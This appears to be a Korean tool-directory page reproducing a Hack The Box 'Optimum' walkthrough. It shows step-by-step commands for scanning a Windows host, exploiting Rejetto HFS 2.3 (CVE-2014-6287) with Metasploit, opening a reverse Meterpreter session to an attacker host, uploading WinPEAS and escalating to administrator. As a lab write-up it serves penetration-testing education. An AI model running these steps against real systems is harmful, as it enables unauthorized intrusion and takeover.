Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Optimum — Hack The Box의 Optimum 머신에 대한 분석. 이 워크스루는 Rejetto HttpFileServer 2.3(CVE-2014-6287)의 악용을 통해 초기 액세스를 얻은 다음, 열거 기술과 사후 악용 도구를 사용하여 Windows 호스트에서 권한 상승을 수행하는 방법을 다룹니다. | Kitploit
도구/GitHubGitHub/r3fr4kt/optimum
Privilege EscalationReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingLearning & Education
GitHubr3fr4kt/optimum
26개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Optimum

Hack The Box의 Optimum 머신에 대한 분석. 이 워크스루는 Rejetto HttpFileServer 2.3(CVE-2014-6287)의 악용을 통해 초기 액세스를 얻은 다음, 열거 기술과 사후 악용 도구를 사용하여 Windows 호스트에서 권한 상승을 수행하는 방법을 다룹니다.

저장소 보기

Optimum


Optimum – Hack The Box 라이트업

개요

이 머신의 목표는 취약한 웹 서비스를 악용하여 Windows 호스트에 대한 초기 접근을 획득한 다음, 권한을 상승시켜 관리자 플래그를 얻는 것입니다.

공격 경로는 다음과 같습니다:

  • 서비스 열거
  • Rejetto HTTP File Server 2.3 악용
  • Metasploit을 통한 초기 접근
  • WinPEAS 및 Metasploit 포스트 익스플로잇 모듈을 사용한 권한 상승

정찰

노출된 서비스를 식별하기 위해 전체 TCP 포트 스캔으로 시작합니다.

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

스캔 결과 포트 80이 열려 있음을 확인합니다.

다음으로 서비스 및 버전 스캔을 수행합니다.

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

결과는 다음 서비스를 식별합니다:

root@kitploit:~
HttpFileServer 2.3

이 서비스는 경량 파일 공유 웹 서버인 Rejetto HTTP File Server에 해당합니다.


취약점 식별

감지된 버전을 조사한 후, 알려진 취약점을 발견합니다:

root@kitploit:~
CVE-2014-6287

이 취약점은 부적절한 입력 검증으로 인해 원격 코드 실행을 허용합니다.


악용

취약점을 악용하기 위해 Metasploit을 사용합니다.

Metasploit을 시작합니다:

root@kitploit:~
msfconsole -q

적절한 모듈을 검색합니다:

root@kitploit:~
search rejetto

익스플로잇 모듈을 로드합니다:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

필요한 옵션을 구성합니다:

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

실행되면 익스플로잇은 대상 머신에서 Meterpreter 세션을 제공합니다.


초기 접근

획득한 Meterpreter 세션을 통해 파일 시스템을 탐색하여 사용자 플래그를 획득합니다.

root@kitploit:~
cd
cat user.txt
whoami

명령 출력은 우리가 다음 사용자로 로그인되어 있음을 보여줍니다:

root@kitploit:~
kostas

이 사용자는 관리자 권한이 없으므로 권한 상승을 진행합니다.


권한 상승 열거

잠재적인 권한 상승 벡터를 식별하기 위해 잘 알려진 Windows 권한 상승 열거 도구인 WinPEAS를 업로드합니다.

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

그런 다음 실행합니다:

root@kitploit:~
shell
.\wp.exe

출력은 사용자 kostas와 관련된 자격 증명을 포함한 유용한 정보를 보여줍니다.


권한 상승

가능한 상승 벡터를 검토한 후 Metasploit 모듈을 사용합니다:

root@kitploit:~
local_exploit_suggester

모듈을 로드합니다:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

세션을 구성합니다:

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

이 모듈은 권한 상승에 사용할 수 있는 가능한 로컬 익스플로잇을 제안합니다.

권한 상승에 성공한 후 관리자 권한을 가진 셸을 획득합니다.

확인:

root@kitploit:~
shell
whoami

관리자 접근

관리자 권한을 획득한 후 루트 플래그를 획득하기 위해 Administrator 디렉터리로 이동합니다.

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

주요 교훈

이 머신은 몇 가지 중요한 침투 테스트 개념을 보여줍니다:

  • 취약한 소프트웨어를 식별하는 데 적절한 서비스 열거가 중요합니다.
  • CVE-2014-6287과 같은 공개적으로 알려진 취약점은 즉각적인 원격 코드 실행으로 이어질 수 있습니다.
  • WinPEAS와 같은 도구는 Windows 환경에서 권한 상승 기회를 식별하는 데 도움이 됩니다.
  • Metasploit 포스트 익스플로잇 모듈은 권한 상승 프로세스를 가속화할 수 있습니다.
도구 다운로드